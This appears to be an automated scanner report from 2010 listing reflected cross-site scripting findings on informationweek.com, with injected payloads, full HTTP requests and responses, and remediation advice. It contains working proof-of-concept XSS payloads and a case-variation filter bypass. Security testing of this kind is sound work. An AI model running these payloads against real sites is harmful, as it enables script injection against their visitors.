<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/btg/iwbtn/user/register93c94</script><a>75eb4bf9d34;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=868362529;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43daf"a%3d"b"26635190e1 was submitted in the REST URL parameter 5. This input was echoed as 43daf"a="b"26635190e1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /GLOBAL/btg/iwbtn/user/register.jhtml43daf"a%3d"b"26635190e1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30120
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/btg/iwbtn/user/register43daf"a="b"26635190e1;kvarticleid=;kvauthor=;loc=300;grp=777728616" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eabc"><img%20src%3da%20onerror%3dalert(1)>44096f13246 was submitted in the REST URL parameter 1. This input was echoed as 2eabc"><img src=a onerror=alert(1)>44096f13246 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /2eabc"><img%20src%3da%20onerror%3dalert(1)>44096f13246/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:41 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:41 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31431
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//2eabc"><img src=a onerror=alert(1)>44096f13246/;kvarticleid=;kvauthor=;loc=300;grp=636009824" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a7be</ScRiPt%20><a%20b%3dc>20e1010380b was submitted in the REST URL parameter 1. This input was echoed as 3a7be</ScRiPt ><a b=c>20e1010380b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /3a7be</ScRiPt%20><a%20b%3dc>20e1010380b/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31361
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//3a7be</ScRiPt ><a b=c>20e1010380b/main/archives;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=641403971;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b34"%20a%3db%20eae4008d423 was submitted in the REST URL parameter 4. This input was echoed as 73b34" a=b eae4008d423 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/david_berlinds_tech_radar73b34"%20a%3db%20eae4008d423/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59324
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/david_berlinds_tech_radar73b34" a=b eae4008d423/in;kvarticleid=;kvauthor=;loc=300;grp=673960522" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27123</script>d37dc33f31f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/david_berlinds_tech_radar27123</script>d37dc33f31f/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59330
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/david_berlinds_tech_radar27123</script>d37dc33f31f;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=332843015;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74918'-alert(1)-'b427949f276 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog74918'-alert(1)-'b427949f276/main/archives/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:39 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:39 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31327
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//blog74918'-alert(1)-'b427949f276/main/archives/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=79470540;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f61c8"style%3d"x%3aexpression(alert(1))"cc3df39b6a2 was submitted in the REST URL parameter 1. This input was echoed as f61c8"style="x:expression(alert(1))"cc3df39b6a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /blogf61c8"style%3d"x%3aexpression(alert(1))"cc3df39b6a2/main/archives/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31416
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <IMG height=1 width=1 SRC="http://view.atdmt.com/action/MSFT_TechWeb_AE_ExtData/v3/atc1.informationweek/atc2.blogf61c8"style="x:expression(alert(1))"cc3df39b6a2/atc3./"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1df9"%20style%3dx%3aexpression(alert(1))%20c7235a52672 was submitted in the REST URL parameter 2. This input was echoed as b1df9" style=x:expression(alert(1)) c7235a52672 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /blog/b1df9"%20style%3dx%3aexpression(alert(1))%20c7235a52672/archives/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:46 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:46 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64731
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91826'-alert(1)-'1d4eb92758f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/91826'-alert(1)-'1d4eb92758f/archives/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64681
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b003f"><a%20b%3dc>f28ae0d9a92 was submitted in the REST URL parameter 3. This input was echoed as b003f"><a b=c>f28ae0d9a92 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archivesb003f"><a%20b%3dc>f28ae0d9a92/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63703
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archivesb003f"><a b=c>f28ae0d9a92/digital_life/i;kvarticleid=;kvauthor=;loc=300;grp=801274801" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ab08</script><a%20b%3dc>cb53909b3cb was submitted in the REST URL parameter 3. This input was echoed as 1ab08</script><a b=c>cb53909b3cb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives1ab08</script><a%20b%3dc>cb53909b3cb/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63717
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archives1ab08</script><a b=c>cb53909b3cb/digital;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=152048639;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0143"><a%20b%3dc>6322ac6ed27 was submitted in the REST URL parameter 4. This input was echoed as f0143"><a b=c>6322ac6ed27 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/digital_lifef0143"><a%20b%3dc>6322ac6ed27/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59085
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/digital_lifef0143"><a b=c>6322ac6ed27/index;kvarticleid=;kvauthor=;loc=300;grp=254361901" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f11'-alert(1)-'a6fe55c5adf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/digital_life95f11'-alert(1)-'a6fe55c5adf/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:15 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:15 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59170
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/digital_life95f11'-alert(1)-'a6fe55c5adf/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=445774479;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7775"a%3d"b"194f11cacb7 was submitted in the REST URL parameter 5. This input was echoed as a7775"a="b"194f11cacb7 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/main/archives/digital_life/a7775"a%3d"b"194f11cacb7 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:19 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:19 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62732
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_DigitalLife_Welcome_Ad_1x1;key=digital_life+/blog/main/archives/digital_life/a7775"a="b"194f11cacb7/ind;kvarticleid=;kvauthor=;loc=300;grp=358828890" target="_blank"> ...[SNIP]...
